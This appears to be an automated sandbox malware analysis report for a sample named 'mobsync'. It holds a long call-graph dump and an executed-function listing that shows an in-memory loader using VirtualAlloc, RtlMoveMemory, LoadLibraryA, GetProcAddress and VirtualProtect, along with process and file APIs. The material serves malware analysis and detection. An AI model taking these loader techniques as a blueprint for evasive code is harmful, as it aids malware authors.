GetPEB 6538->6540 6544 2c1c23 6539->6544 6545 2c3f00 GetPEB 6539->6545 6542 2c1be5 6540->6542 6541 2c3e60 GetPEB 6541->6555 6543 2c3e60 GetPEB 6542->6543 6543->6539 6547 2c1c4b 6544->6547 6550 2c3f00 GetPEB 6544->6550 6546 2c1c17 6545->6546 6549 2c3e60 GetPEB 6546->6549 6547->6156 6548 2c3f00 GetPEB 6548->6555 6549->6544 6552 2c1c3f 6550->6552 6551 2c4e30 GetPEB 6551->6555 6553 2c3e60 GetPEB 6552->6553 6553->6547 6555->6535 6555->6537 6555->6541 6555->6548 6555->6551 6588 2c35c0 6555->6588 6557 2c422d 6556->6557 6562 2c4243 6556->6562 6558 2c3f00 GetPEB 6557->6558 6559 2c4237 6558->6559 6560 2c3e60 GetPEB 6559->6560 6560->6562 6561 2c426b 6561->6141 6562->6561 6563 2c3f00 GetPEB 6562->6563 6564 2c425f 6563->6564 6565 2c3e60 GetPEB 6564->6565 6565->6561 6574 2c5701 6566->6574 6567 2c57e3 6569 2c5723 6567->6569 6570 2c3f00 GetPEB 6567->6570 6568 2c3f00 GetPEB 6568->6574 6569->6527 6571 2c57f6 6570->6571 6573 2c3e60 GetPEB 6571->6573 6572 2c3e60 GetPEB 6572->6574 6573->6569 6574->6567 6574->6568 6574->6569 6574->6572 6576 2c29a0 6575->6576 6577 2c2abf 6576->6577 6578 2c3f00 GetPEB 6576->6578 6579 2c3e60 GetPEB 6576->6579 6580 2c3f00 GetPEB 6577->6580 6582 2c2ae4 6577->6582 6583 2c2b0c 6577->6583 6578->6576 6579->6576 6581 2c2ad8 6580->6581 6584 2c3e60 GetPEB 6581->6584 6582->6583 6585 2c3f00 GetPEB 6582->6585 6583->6527 6584->6582 6586 2c2b00 6585->6586 6587 2c3e60 GetPEB 6586->6587 6587->6583 6589 2c35e4 6588->6589 6590 2c3609 6589->6590 6591 2c3f00 GetPEB 6589->6591 6594 2c3f00 GetPEB 6590->6594 6597 2c3631 6590->6597 6592 2c35fd 6591->6592 6593 2c3e60 GetPEB 6592->6593 6593->6590 6595 2c3625 6594->6595 6596 2c3e60 GetPEB 6595->6596 6596->6597 6597->6555 6599 2c5516 6598->6599 6604 2c552c 6598->6604 6600 2c3f00 GetPEB 6599->6600 6601 2c5520 6600->6601 6602 2c3e60 GetPEB 6601->6602 6602->6604 6603 2c5586 6603->6178 6604->6603 6605 2c3f00 GetPEB 6604->6605 6606 2c557a 6605->6606 6607 2c3e60 GetPEB 6606->6607 6607->6603 6616 2cab66 6608->6616 6611 2cab8c 6611->6191 6612 2cac52 6613 2cac71 6612->6613 6614 2c3f00 GetPEB 6612->6614 6617 2cac99 6613->6617 6620 2c3f00 GetPEB 6613->6620 6615 2cac65 6614->6615 6618 2c3e60 GetPEB 6615->6618 6616->6611 6616->6612 6619 2c3f00 GetPEB 6616->6619 6621 2c3e60 GetPEB 6616->6621 6681 2c4b70 6616->6681 6703 2cacd0 6616->6703 6617->6191 6618->6613 6619->6616 6622 2cac8d 6620->6622 6621->6616 6623 2c3e60 GetPEB 6622->6623 6623->6617 6644 2ca189 6624->6644 6625 2cacd0 GetPEB 6625->6644 6626 2ca552 6629 2ca571 6626->6629 6632 2c3f00 GetPEB 6626->6632 6627 2ca439 6627->6191 6635 2ca599 6629->6635 6639 2c3f00 GetPEB 6629->6639 6630 2c4220 GetPEB 6630->6644 6631 2c34c0 GetPEB 6631->6644 6634 2ca565 6632->6634 6633 2c4b70 2 API calls 6633->6644 6637 2c3e60 GetPEB 6634->6637 6635->6191 6636 2c3f00 GetPEB 6636->6644 6637->6629 6640 2ca58d 6639->6640 6642 2c3e60 GetPEB 6640->6642 6641 2c3460 GetPEB 6641->6644 6642->6635 6643 2c3e60 GetPEB 6643->6644 6644->6625 6644->6626 6644->6627 6644->6630 6644->6631 6644->6633 6644->6636 6644->6641 6644->6643 6713 2cb520 6644->6713 6721 2c1150 6644->6721 6664 2ca7c5 6645->6664 6646 2caa19 6646->6191 6647 2cacd0 GetPEB 6647->6664 6648 2caa7c GetCurrentProcessId 6648->6664 6649 2caacd 6650 2caaec 6649->6650 6654 2c3f00 GetPEB 6649->6654 6658 2cab14 6650->6658 6659 2c3f00 GetPEB 6650->6659 6651 2c4b70 2 API calls 6651->6664 6655 2caae0 6654->6655 6657 2c3e60 GetPEB 6655->6657 6656 2c42c0 GetPEB 6656->6664 6657->6650 6658->6191 6660 2cab08 6659->6660 6662 2c3e60 GetPEB 6660->6662 6661 2c3e60 GetPEB 6661->6664 6662->6658 6663 2c3f00 GetPEB 6663->6664 6664->6646 6664->6647 6664->6648 6664->6649 6664->6651 6664->6656 6664->6661 6664->6663 6736 2c49a0 6664->6736 6746 2c4850 6664->6746 6666 2ca5ef 6665->6666 6668 2ca731 6666->6668 6669 2ca710 6666->6669 6671 2c3f00 GetPEB 6666->6671 6672 2c42c0 GetPEB 6666->6672 6676 2c3e60 GetPEB 6666->6676 6755 2c4370 6666->6755 6670 2ca750 6668->6670 6673 2c3f00 GetPEB 6668->6673 6669->6191 6677 2ca778 6670->6677 6678 2c3f00 GetPEB 6670->6678 6671->6666 6672->6666 6674 2ca744 6673->6674 6675 2c3e60 GetPEB 6674->6675 6675->6670 6676->6666 6677->6191 6679 2ca76c 6678->6679 6680 2c3e60 GetPEB 6679->6680 6680->6677 6682 2c4b82 6681->6682 6686 2c4b98 6681->6686 6683 2c3f00 GetPEB 6682->6683 6684 2c4b8c 6683->6684 6685 2c3e60 GetPEB 6684->6685 6685->6686 6687 2c4bd7 CreateProcessW 6686->6687 6688 2c3f00 GetPEB 6686->6688 6689 2c4bf7 6687->6689 6690 2c4c73 6687->6690 6691 2c4bc6 6688->6691 6692 2c4bff 6689->6692 6693 2c4c33 6689->6693 6695 2c3f00 GetPEB 6689->6695 6690->6616 6694 2c3e60 GetPEB 6691->6694 6692->6616 6699 2c4c5d 6693->6699 6700 2c3f00 GetPEB 6693->6700 6696 2c4bd2 6694->6696 6697 2c4c27 6695->6697 6696->6687 6698 2c3e60 GetPEB 6697->6698 6698->6693 6699->6616 6701 2c4c51 6700->6701 6702 2c3e60 GetPEB 6701->6702 6702->6699 6710 2caced 6703->6710 6704 2c34c0 GetPEB 6704->6710 6705 2caf9f 6706 2caf37 6705->6706 6707 2c3f00 GetPEB 6705->6707 6706->6616 6708 2cafb2 6707->6708 6711 2c3e60 GetPEB 6708->6711 6709 2c3f00 GetPEB 6709->6710 6710->6704 6710->6705 6710->6706 6710->6709 6712 2c3e60 GetPEB 6710->6712 6711->6706 6712->6710 6720 2cb536 6713->6720 6714 2cb55f 6714->6644 6715 2cb633 6730 2c4fd0 6715->6730 6717 2cb63f 6717->6644 6718 2c3e60 GetPEB 6718->6720 6719 2c3f00 GetPEB 6719->6720 6720->6714 6720->6715 6720->6717 6720->6718 6720->6719 6727 2c1160 6721->6727 6722 2c124c 6723 2c1244 6722->6723 6725 2c3f00 GetPEB 6722->6725 6723->6644 6724 2c3f00 GetPEB 6724->6727 6726 2c125f 6725->6726 6728 2c3e60 GetPEB 6726->6728 6727->6722 6727->6723 6727->6724 6729 2c3e60 GetPEB 6727->6729 6728->6723 6729->6727 6731 2c4ff9 6730->6731 6732 2c500f 6730->6732 6733 2c3f00 GetPEB 6731->6733 6732->6717 6734 2c5003 6733->6734 6735 2c3e60 GetPEB 6734->6735 6735->6732 6745 2c49c0 6736->6745 6737 2c4b37 6738 2c49ea 6737->6738 6739 2c3f00 GetPEB 6737->6739 6738->6664 6741 2c4b4a 6739->6741 6740 2c34c0 GetPEB 6740->6745 6742 2c3e60 GetPEB 6741->6742 6742->6738 6743 2c3e60 GetPEB 6743->6745 6744 2c3f00 GetPEB 6744->6745 6745->6737 6745->6738 6745->6740 6745->6743 6745->6744 6752 2c4870 6746->6752 6747 2c496e 6748 2c492c 6747->6748 6749 2c3f00 GetPEB 6747->6749 6748->6664 6751 2c4981 6749->6751 6750 2c3f00 GetPEB 6750->6752 6753 2c3e60 GetPEB 6751->6753 6752->6747 6752->6748 6752->6750 6754 2c3e60 GetPEB 6752->6754 6753->6748 6754->6752 6756 2c450e 6755->6756 6757 2c4384 6755->6757 6756->6666 6757->6756 6758 2c3f00 GetPEB 6757->6758 6761 2c43d6 6757->6761 6759 2c43ca 6758->6759 6760 2c3e60 GetPEB 6759->6760 6760->6761 6762 2c3f00 GetPEB 6761->6762 6769 2c4436 6761->6769 6774 2c44f4 6761->6774 6763 2c442a 6762->6763 6764 2c3e60 GetPEB 6763->6764 6764->6769 6765 2c44ba 6775 2c4550 6765->6775 6767 2c3f00 GetPEB 6767->6769 6769->6765 6769->6767 6770 2c3e60 GetPEB 6769->6770 6770->6769 6771 2c3f00 GetPEB 6772 2c44e8 6771->6772 6773 2c3e60 GetPEB 6772->6773 6773->6774 6774->6666 6777 2c44d0 6775->6777 6778 2c456b 6775->6778 6776 2c3e60 GetPEB 6776->6778 6777->6771 6777->6774 6778->6776 6778->6777 6779 2c3f00 GetPEB 6778->6779 6779->6778 6788 2c55c6 6780->6788 6781 2c56a8 6783 2c55e8 6781->6783 6784 2c3f00 GetPEB 6781->6784 6782 2c3f00 GetPEB 6782->6788 6783->6213 6785 2c56bb 6784->6785 6787 2c3e60 GetPEB 6785->6787 6786 2c3e60 GetPEB 6786->6788 6787->6783 6788->6781 6788->6782 6788->6783 6788->6786 6797 2c4ca0 6789->6797 6790 2c3f00 GetPEB 6790->6797 6791 2c4db4 6792 2c4d7c 6791->6792 6793 2c3f00 GetPEB 6791->6793 6792->6213 6795 2c4dc7 6793->6795 6794 2c3e60 GetPEB 6794->6797 6796 2c3e60 GetPEB 6795->6796 6796->6792 6797->6790 6797->6791 6797->6792 6797->6794 6799 2c46d7 6798->6799 6804 2c46ed 6798->6804 6800 2c3f00 GetPEB 6799->6800 6801 2c46e1 6800->6801 6802 2c3e60 GetPEB 6801->6802 6802->6804 6803 2c4760 6803->6222 6804->6803 6805 2c3f00 GetPEB 6804->6805 6810 2c4721 6804->6810 6806 2c4715 6805->6806 6808 2c3e60 GetPEB 6806->6808 6807 2c4752 6807->6222 6808->6810 6809 2c3f00 GetPEB 6811 2c4746 6809->6811 6810->6807 6810->6809 6812 2c3e60 GetPEB 6811->6812 6812->6807 6825 2c25f0 6813->6825 6814 2c2771 6814->6246 6815 2c2912 6816 2c2937 6815->6816 6818 2c3f00 GetPEB 6815->6818 6820 2c295f 6816->6820 6823 2c3f00 GetPEB 6816->6823 6817 2c42c0 GetPEB 6817->6825 6819 2c292b 6818->6819 6821 2c3e60 GetPEB 6819->6821 6820->6246 6821->6816 6822 2c3f00 GetPEB 6822->6825 6824 2c2953 6823->6824 6827 2c3e60 GetPEB 6824->6827 6825->6814 6825->6815 6825->6817 6825->6822 6826 2c3e60 GetPEB 6825->6826 6826->6825 6827->6820 6835 2c1010 6828->6835 6829 2c3f00 GetPEB 6829->6835 6830 2c1105 6831 2c103a 6830->6831 6833 2c3f00 GetPEB 6830->6833 6831->6271 6832 2c3e60 GetPEB 6832->6835 6834 2c1118 6833->6834 6836 2c3e60 GetPEB 6834->6836 6835->6829 6835->6830 6835->6831 6835->6832 6836->6831 6838 2c34c0 GetPEB 6837->6838 6839 2c36c4 6838->6839 6840 2c36e5 6839->6840 6841 2c3f00 GetPEB 6839->6841 6844 2c3f00 GetPEB 6840->6844 6846 2c371a 6840->6846 6842 2c36d9 6841->6842 6843 2c3e60 GetPEB 6842->6843 6843->6840 6845 2c370e 6844->6845 6847 2c3e60 GetPEB 6845->6847 6848 2c3742 6846->6848 6849 2c3f00 GetPEB 6846->6849 6847->6846 6851 2c376e 6848->6851 6853 2c3f00 GetPEB 6848->6853 6850 2c3736 6849->6850 6852 2c3e60 GetPEB 6850->6852 6851->6049 6852->6848 6854 2c3762 6853->6854 6855 2c3e60 GetPEB 6854->6855 6855->6851 6862 2c7712 6856->6862 6857 2c77b3 6859 2c77d2 6857->6859 6861 2c3f00 GetPEB 6857->6861 6858 2c34c0 GetPEB 6858->6862 6859->6353 6860 2c78a3 6860->6353 6863 2c77c6 6861->6863 6862->6857 6862->6858 6862->6860 6864 2c3f00 GetPEB 6862->6864 6866 2c3e60 GetPEB 6862->6866 6865 2c3e60 GetPEB 6863->6865 6864->6862 6865->6859 6866->6862 7101 2c9b60 7104 2c9b80 7101->7104 7102 2c9d96 7103 2c9d12 7102->7103 7105 2c3f00 GetPEB 7102->7105 7104->7102 7104->7103 7106 2c9dd0 GetPEB 7104->7106 7109 2c3f00 GetPEB 7104->7109 7110 2c3e60 GetPEB 7104->7110 7107 2c9da9 7105->7107 7106->7104 7108 2c3e60 GetPEB 7107->7108 7108->7103 7109->7104 7110->7104 7111 2c47e0 7112 2c4c80 GetPEB 7111->7112 7113 2c47f5 7112->7113 5818 2b0170 5819 2b01fb 5818->5819 5834 2b0ad0 5819->5834 5825 2b02c4 5871 2b06f0 5825->5871 5827 2b02d0 5888 2b08f0 5827->5888 5829 2b02dc 5906 2b0580 5829->5906 5831 2b02e8 5832 2b02ef VirtualFree 5831->5832 5833 2b02fb 5831->5833 5832->5833 5835 2b0b2f 5834->5835 5836 2b0bf0 VirtualAlloc 5835->5836 5839 2b02ab 5835->5839 5837 2b0c1c 5836->5837 5838 2b0cdb VirtualAlloc 5837->5838 5837->5839 5838->5839 5840 2b0d60 5839->5840 5841 2b0d94 5840->5841 5842 2b0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2b02b8 5842->5843 5847 2b0ddb 5842->5847 5850 2b0400 GetCurrentProcess 5843->5850 5845 2b0e0d RtlMoveMemory 5845->5847 5846 2b0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 2b0e6a RtlMoveMemory 5847->5848 5849 2b0e91 RtlFillMemory 5847->5849 5914 2b1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 2b1140 lstrcpynW 5850->5915 5852 2b0459 NtQueryInformationProcess 5853 2b046f 5852->5853 5856 2b04c5 5852->5856 5854 2b0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 2b0484 GetProcessHeap HeapFree 5853->5855 5858 2b0575 5853->5858 5854->5853 5854->5856 5855->5854 5857 2b04e5 5856->5857 5921 2b1140 lstrcpynW 5856->5921 5916 2b1140 lstrcpynW 5857->5916 5861 2b04dc RtlMoveMemory 5861->5857 5862 2b04ef RtlMoveMemory 5917 2b1140 lstrcpynW 5862->5917 5864 2b0511 RtlMoveMemory 5918 2b1140 lstrcpynW 5864->5918 5866 2b0528 RtlMoveMemory 5919 2b1140 lstrcpynW 5866->5919 5868 2b053f RtlMoveMemory 5920 2b1140 lstrcpynW 5868->5920 5870 2b055a RtlMoveMemory 5870->5825 5872 2b0740 5871->5872 5878 2b0744 5872->5878 5922 2b0fb0 5872->5922 5875 2b07b5 RtlMoveMemory 5876 2b0770 5875->5876 5877 2b07ff LoadLibraryA 5876->5877 5876->5878 5930 2b1140 lstrcpynW 5876->5930 5879 2b08b9 5877->5879 5882 2b080f 5877->5882 5878->5827 5879->5827 5881 2b082d RtlMoveMemory 5881->5876 5881->5882 5882->5876 5882->5878 5883 2b0858 GetProcAddress 5882->5883 5887 2b0890 RtlMoveMemory 5882->5887 5931 2b1140 lstrcpynW 5882->5931 5932 2b1140 lstrcpynW 5882->5932 5883->5878 5883->5882 5885 2b0872 RtlMoveMemory 5933 2b1140 lstrcpynW 5885->5933 5887->5878 5887->5882 5889 2b0934 5888->5889 5890 2b0fb0 2 API calls 5889->5890 5891 2b0938 5889->5891 5892 2b0970 5890->5892 5891->5829 5892->5891 5936 2b1140 lstrcpynW 5892->5936 5894 2b09af RtlMoveMemory 5894->5891 5898 2b09c2 5894->5898 5897 2b09f6 RtlMoveMemory 5897->5898 5898->5891 5937 2b1140 lstrcpynW 5898->5937 5938 2b1140 lstrcpynW 5898->5938 5940 2b1140 lstrcpynW 5898->5940 5899 2b0a97 RtlMoveMemory 5899->5898 5900 2b0aac 5899->5900 5900->5829 5902 2b0a3e RtlMoveMemory 5902->5891 5903 2b0a57 5902->5903 5939 2b1140 lstrcpynW 5903->5939 5905 2b0a61 RtlMoveMemory 5905->5898 5907 2b05bc 5906->5907 5908 2b05c0 5907->5908 5912 2b069b VirtualProtect 5907->5912 5941 2b1140 lstrcpynW 5907->5941 5942 2b1140 lstrcpynW 5907->5942 5908->5831 5910 2b0617 RtlMoveMemory 5910->5907 5912->5907 5913 2b06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 2b0fda 5922->5924 5923 2b104a 5923->5876 5924->5923 5934 2b1140 lstrcpynW 5924->5934 5926 2b1001 5935 2b1140 lstrcpynW 5926->5935 5928 2b101b RtlMoveMemory 5929 2b1029 5928->5929 5929->5876 5930->5875 5931->5881 5932->5885 5933->5882 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5899 5941->5910 5942->5907 6867 2c4b70 6868 2c4b82 6867->6868 6872 2c4b98 6867->6872 6869 2c3f00 GetPEB 6868->6869 6870 2c4b8c 6869->6870 6871 2c3e60 GetPEB 6870->6871 6871->6872 6873 2c4bd7 CreateProcessW 6872->6873 6874 2c3f00 GetPEB 6872->6874 6875 2c4bf7 6873->6875 6876 2c4c73 6873->6876 6877 2c4bc6 6874->6877 6878 2c4bff 6875->6878 6879 2c4c33 6875->6879 6881 2c3f00 GetPEB 6875->6881 6880 2c3e60 GetPEB 6877->6880 6885 2c4c5d 6879->6885 6886 2c3f00 GetPEB 6879->6886 6882 2c4bd2 6880->6882 6883 2c4c27 6881->6883 6882->6873 6884 2c3e60 GetPEB 6883->6884 6884->6879 6887 2c4c51 6886->6887 6888 2c3e60 GetPEB 6887->6888 6888->6885 6917 2c78b0 6927 2c7990 6917->6927 6918 2c7c1e 6920 2c7c3d 6918->6920 6922 2c3f00 GetPEB 6918->6922 6919 2c34c0 GetPEB 6919->6927 6921 2c7c05 6923 2c7c31 6922->6923 6924 2c3e60 GetPEB 6923->6924 6924->6920 6925 2c3e60 GetPEB 6925->6927 6926 2c3f00 GetPEB 6926->6927 6927->6918 6927->6919 6927->6921 6927->6925 6927->6926 6934 2c7fb0 6935 2c34c0 GetPEB 6934->6935 6936 2c7fc2 6935->6936 6937 2c3f00 GetPEB 6936->6937 6938 2c7fe3 6936->6938 6939 2c7fd7 6937->6939 6940 2c8029 6938->6940 6942 2c3f00 GetPEB 6938->6942 6941 2c3e60 GetPEB 6939->6941 6945 2c8051 6940->6945 6946 2c3f00 GetPEB 6940->6946 6941->6938 6943 2c801d 6942->6943 6944 2c3e60 GetPEB 6943->6944 6944->6940 6948 2c807d 6945->6948 6950 2c3f00 GetPEB 6945->6950 6947 2c8045 6946->6947 6949 2c3e60 GetPEB 6947->6949 6949->6945 6951 2c8071 6950->6951 6952 2c3e60 GetPEB 6951->6952 6952->6948 6953 2c64b0 6954 2c64ba 6953->6954 6959 2c64d0 6953->6959 6955 2c3f00 GetPEB 6954->6955 6956 2c64c4 6955->6956 6957 2c3e60 GetPEB 6956->6957 6957->6959 6958 2c659a 6959->6958 6960 2c42c0 GetPEB 6959->6960 6961 2c657b 6960->6961 6961->6958 6963 2c4160 6961->6963 6964 2c4180 6963->6964 6965 2c4172 6963->6965 6964->6958 6966 2c3f00 GetPEB 6965->6966 6967 2c4177 6966->6967 6968 2c3e60 GetPEB 6967->6968 6968->6964 7130 2c4df0 GetPEB 6969 2c6208 6977 2c6202 6969->6977 6970 2c55b0 GetPEB 6970->6977 6971 2c4c80 GetPEB 6971->6977 6972 2c42c0 GetPEB 6972->6977 6973 2c624b 6974 2c3f00 GetPEB 6974->6977 6975 2c6490 6976 2c3f00 GetPEB 6979 2c642d 6976->6979 6977->6970 6977->6971 6977->6972 6977->6973 6977->6974 6978 2c3e60 GetPEB 6977->6978 6977->6979 6978->6977 6979->6975 6979->6976 6980 2c3e60 GetPEB 6979->6980 6980->6979 6981 2c6608 7023 2c65fd 6981->7023 6982 2c94d0 GetPEB 6982->7023 6983 2c8bb0 2 API calls 6983->7023 6984 2c706e 6993 2c8740 3 API calls 6984->6993 6985 2c9f30 GetPEB 6985->7023 6986 2c68df 6987 2c6dcd 6994 2cb2e0 GetPEB 6987->6994 6988 2c7410 GetPEB 6988->7023 6989 2c7061 7001 2c8d40 2 API calls 6989->7001 6990 2c72d0 GetPEB 6990->7023 6991 2c9050 GetPEB 6991->7023 6992 2cb1d0 GetPEB 6992->7023 7003 2c7073 6993->7003 6994->6986 6995 2c53d0 GetPEB 6995->7023 6996 2c6f27 GetTickCount 6996->7023 6997 2c9270 GetPEB 6997->7023 6998 2c7120 3 API calls 6998->7023 6999 2c8700 GetPEB 6999->7023 7000 2c9860 6 API calls 7000->7023 7010 2c7066 7001->7010 7002 2c61e0 GetPEB 7002->7023 7004 2c80a0 2 API calls 7004->7023 7005 2c3e60 GetPEB 7005->7023 7006 2c12b0 2 API calls 7006->7023 7007 2cb430 3 API calls 7007->7023 7008 2c8970 2 API calls 7008->7023 7009 2c3f00 GetPEB 7009->7023 7011 2c4770 2 API calls 7011->7023 7012 2c3310 GetPEB 7012->7023 7013 2c4220 GetPEB 7013->7023 7014 2c6060 GetPEB 7014->7023 7015 2c8400 2 API calls 7015->7023 7016 2c8e80 2 API calls 7016->7023 7017 2c9620 2 API calls 7017->7023 7018 2c6975 GetTickCount 7018->7023 7019 2c1840 GetPEB 7019->7023 7020 2c3460 GetPEB 7020->7023 7021 2cafe0 GetPEB 7021->7023 7022 2c4160 GetPEB 7022->7023 7023->6982 7023->6983 7023->6984 7023->6985 7023->6986 7023->6987 7023->6988 7023->6989 7023->6990 7023->6991 7023->6992 7023->6995 7023->6996 7023->6997 7023->6998 7023->6999 7023->7000 7023->7002 7023->7004 7023->7005 7023->7006 7023->7007 7023->7008 7023->7009 7023->7011 7023->7012 7023->7013 7023->7014 7023->7015 7023->7016 7023->7017 7023->7018 7023->7019 7023->7020 7023->7021 7023->7022 5969 2c3780 5970 2c3795 5969->5970 5971 2c37ab 5969->5971 5972 2c3f00 GetPEB 5970->5972 5975 2c37dd 5971->5975 5976 2c3f00 GetPEB 5971->5976 5973 2c379f 5972->5973 5974 2c3e60 GetPEB 5973->5974 5974->5971 5979 2c3812 5975->5979 5980 2c3f00 GetPEB 5975->5980 5977 2c37d1 5976->5977 5978 2c3e60 GetPEB 5977->5978 5978->5975 5983 2c384a 5979->5983 5984 2c3f00 GetPEB 5979->5984 5981 2c3806 5980->5981 5982 2c3e60 GetPEB 5981->5982 5982->5979 5987 2c3876 5983->5987 5988 2c3f00 GetPEB 5983->5988 5985 2c383e 5984->5985 5986 2c3e60 GetPEB 5985->5986 5986->5983 5991 2c38d1 SHFileOperationW 5987->5991 5992 2c3f00 GetPEB 5987->5992 5989 2c386a 5988->5989 5990 2c3e60 GetPEB 5989->5990 5990->5987 5993 2c38c0 5992->5993 5994 2c3e60 GetPEB 5993->5994 5995 2c38cc 5994->5995 5995->5991 7036 2c2b80 7037 2c2b99 7036->7037 7038 2c2baf 7036->7038 7039 2c3f00 GetPEB 7037->7039 7040 2c2ba3 7039->7040 7041 2c3e60 GetPEB 7040->7041 7041->7038 7137 2c7e40 7138 2c7e50 7137->7138 7139 2c7f83 7138->7139 7140 2c7f7a 7138->7140 7143 2c34c0 GetPEB 7138->7143 7144 2c3e60 GetPEB 7138->7144 7145 2c3f00 GetPEB 7138->7145 7141 2c38f0 2 API calls 7139->7141 7142 2c7f96 7141->7142 7143->7138 7144->7138 7145->7138 7057 2ca198 7077 2ca189 7057->7077 7058 2cacd0 GetPEB 7058->7077 7059 2ca552 7064 2c3f00 GetPEB 7059->7064 7065 2ca571 7059->7065 7060 2ca439 7061 2c1150 GetPEB 7061->7077 7062 2c4220 GetPEB 7062->7077 7063 2c34c0 GetPEB 7063->7077 7067 2ca565 7064->7067 7068 2ca599 7065->7068 7072 2c3f00 GetPEB 7065->7072 7066 2c4b70 2 API calls 7066->7077 7069 2c3e60 GetPEB 7067->7069 7069->7065 7070 2cb520 GetPEB 7070->7077 7071 2c3f00 GetPEB 7071->7077 7073 2ca58d 7072->7073 7075 2c3e60 GetPEB 7073->7075 7074 2c3460 GetPEB 7074->7077 7075->7068 7076 2c3e60 GetPEB 7076->7077 7077->7058 7077->7059 7077->7060 7077->7061 7077->7062 7077->7063 7077->7066 7077->7070 7077->7071 7077->7074 7077->7076 7146 2c1fd8 7153 2c1fd2 7146->7153 7147 2c2208 7148 2c2212 7148->7147 7149 2c4220 GetPEB 7148->7149 7149->7147 7150 2c42c0 GetPEB 7150->7153 7151 2c3f00 GetPEB 7151->7153 7152 2c3e60 GetPEB 7152->7153 7153->7147 7153->7148 7153->7150 7153->7151 7153->7152 7078 2cb110 7079 2cb124 7078->7079 7080 2c6060 GetPEB 7079->7080 7089 2cb1aa 7079->7089 7081 2cb136 7080->7081 7082 2c3310 GetPEB 7081->7082 7083 2cb14c 7082->7083 7084 2c3f00 GetPEB 7083->7084 7087 2cb182 7083->7087 7085 2cb176 7084->7085 7086 2c3e60 GetPEB 7085->7086 7086->7087 7088 2c3f00 GetPEB 7087->7088 7087->7089 7090 2cb19e 7088->7090 7091 2c3e60 GetPEB 7090->7091 7091->7089

                                                                                Executed Functions

                                                                                Function 002B0400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 002B0448
                                                                                  • Part of subcall function 002B1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002B0EFD,00000000), ref: 002B1155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 002B0463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002B0484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 002B048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002B0492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 002B049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002B04A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002B04B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002B04E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002B04F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 002B0519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 002B0530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 002B0547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 002B0562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 0d45f0200f9682b155fe4e534188d073fc66c57c03d9e65f276ec28d56350d11
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: F94151B19343406EE710EB65C856FAFB3EDAB84780F808D1CB75897181D674D9248F62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 2c38f0-2c390b 448 2c3910-2c3915 447->448 449 2c3a69-2c3a6e 448->449 450 2c391b 448->450 453 2c3acc-2c3adf call 2c34c0 449->453 454 2c3a70-2c3a75 449->454 451 2c3a5f-2c3a64 450->451 452 2c3921-2c3926 450->452 451->448 455 2c392c-2c3931 452->455 456 2c3a17-2c3a1e 452->456 475 2c3afc-2c3b17 453->475 476 2c3ae1-2c3af7 call 2c3f00 call 2c3e60 453->476 458 2c3ab6-2c3abb 454->458 459 2c3a77-2c3a7e 454->459 465 2c3937-2c393c 455->465 466 2c3b70-2c3b77 455->466 462 2c3a3b-2c3a4f FindFirstFileW 456->462 463 2c3a20-2c3a36 call 2c3f00 call 2c3e60 456->463 458->448 464 2c3ac1-2c3acb 458->464 460 2c3a9b-2c3ab1 459->460 461 2c3a80-2c3a96 call 2c3f00 call 2c3e60 459->461 460->448 461->460 472 2c3a55-2c3a5a 462->472 473 2c3b97-2c3ba1 462->473 463->462 465->458 474 2c3942-2c3947 465->474 470 2c3b79-2c3b8f call 2c3f00 call 2c3e60 466->470 471 2c3b94 466->471 470->471 471->473 472->448 481 2c394d-2c3953 474->481 482 2c39f1-2c3a12 474->482 496 2c3b19-2c3b2f call 2c3f00 call 2c3e60 475->496 497 2c3b34-2c3b3f 475->497 476->475 488 2c3974-2c3976 481->488 489 2c3955-2c395d 481->489 482->448 492 2c396d-2c3972 488->492 493 2c3978-2c398b call 2c34c0 488->493 489->492 500 2c395f-2c3963 489->500 492->448 509 2c398d-2c39a3 call 2c3f00 call 2c3e60 493->509 510 2c39a8-2c39ec call 2c38f0 call 2c3460 493->510 496->497 512 2c3b5c-2c3b6b 497->512 513 